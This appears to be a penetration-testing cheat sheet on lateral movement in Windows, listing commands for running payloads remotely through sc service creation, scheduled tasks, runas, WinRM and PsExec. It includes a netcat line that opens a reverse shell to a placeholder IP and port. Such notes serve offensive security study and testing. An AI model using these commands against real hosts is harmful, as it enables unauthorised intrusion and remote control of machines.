Spawning Processes Remotely
Administrators
Windows Services
can also be leveraged to run arbitrary commands since they execute a command when started. While a Service executable is technically different from a Regular Application, if we configure a Windows Service to run any application, it will still execute it and Fail Afterwards.
We can create a Service on a Remote Host with sc
which is a Standard Tool available in Windows. When using sc, it will try to connect to the Service Control Manager
(SVCCTL) Remote Service Program through RPC
.
Running as Another User
Runas
Allows a User to run specific tools and programs with Different Permissions than the User's current logon provides.
:: Spawning a Shell as [Another User] [Running Commands as the Other User]
runas /netonly /user:DOMAIN\USERNAME "C:\netcat.exe -e cmd.exe IP PORT"
Creating Services
:: Create a Remote Service
sc \\TARGET create SERVICE_NAME binPath= "Command/PAYLOAD To Run" start= auto
:: Start - Stop - Delete
sc \\TARGET start "SERVICE_NAME"
sc \\TARGET stop "SERVICE_NAME"
sc \\TARGET delete "SERVICE_NAME"
Creating Scheduled Tasks
:: Create
schtasks /s TARGET /RU "SYSTEM" /create /tn "TASK_NAME" /tr "Command/PAYLOAD To Run" /sc ONCE /sd 01/01/2024 /st 00:00
:: Run
schtasks /s TARGET /run /TN "TASK_NAME"
:: List Tasks
tasklist /v
:: Delete Tasks
schtasks /s TARGET /TN "TASK_NAME" /DELETE /F
Remote Process Creation Using WinRM
Remote Management Users
Windows Remote Management
(WinRM) is a Web-Based Protocol used to send Powershell Commands to Windows Hosts remotely. Most Windows Server Installations will have WinRM enabled by Default.
- CMD
- PSH
:: Create Interactive Session
winrs -u:USERNAME -p:PASSWORD -r:TARGET cmd
# Creating PSCredential Object
$username = 'USERNAME';
$password = 'PASSWORD';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
# Create Interactive Session [Enter-PSSession]
Enter-PSSession -Computername TARGET -Credential $credential
# Run Commands Remotely [Invoke-Command]
Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}
PsExec
Administrators
Allows an Administrator User to run Commands Remotely on any PC where he has Access.
:: Accept the [Eula] otherwise the Command won't Work
PsExec64.exe -accepteula
PsExec64.exe \\TARGET_IP -u USERNAME -p PASSWORD -i cmd.exe